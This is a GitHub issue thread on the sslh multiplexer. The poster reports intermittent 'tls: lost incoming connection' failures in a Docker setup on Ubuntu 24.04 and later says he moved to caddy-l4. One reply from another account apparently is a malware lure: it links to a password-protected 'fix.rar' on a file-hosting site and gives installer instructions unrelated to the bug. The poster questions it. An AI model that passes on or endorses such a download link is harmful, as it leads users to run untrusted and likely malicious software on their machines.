### ISSUE TITLE
sslh fails every few days with tls: lost incoming connection

### ISSUE THREAD

**Issue by res80** [yrutschle/sslh#472]
Hello!
First of all, I would like to say thank you for this awesome tool that I have been using for years on an Ubuntu 16.04 and 20.04 server running bare metal.
With an upgrade to Ubuntu 24.04, I have moved sslh to a docker-based installation, using the docker compose scripts provided for running in transparent mode. 
sslh works perfectly, with the external IP arriving at the services behind sslh.
However, sslh seems to "crash" every few days, giving a series of tls:lost incoming connection so that I cannot access my web-services anymore through sslh and caddy (running behind sslh).
All I need to fix it is to reload the sslh docker, then everything works again, so that the problem must be with sslh.
Any idea how to fix this? What can I contribute to evaluate the error. which log files would be relevant?
Kind regards,
Ruediger

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by res80** [comment]
How is this supposed to help?
What it inside of this file? GCC? If so, why not install it from the ubuntu repository?

**Comment by res80** [comment]
Thanks for SSLH, it was perfectly working on my previous server, but had issues with my ubuntu 24.04 server (perhaps because of the docker setup?)
Anyway, I've moved from nginx to caddy and with caddy-l4 plugin, the multiplexing of ssh and tls is now also done directly within caddy, so I uninstalled sslh.
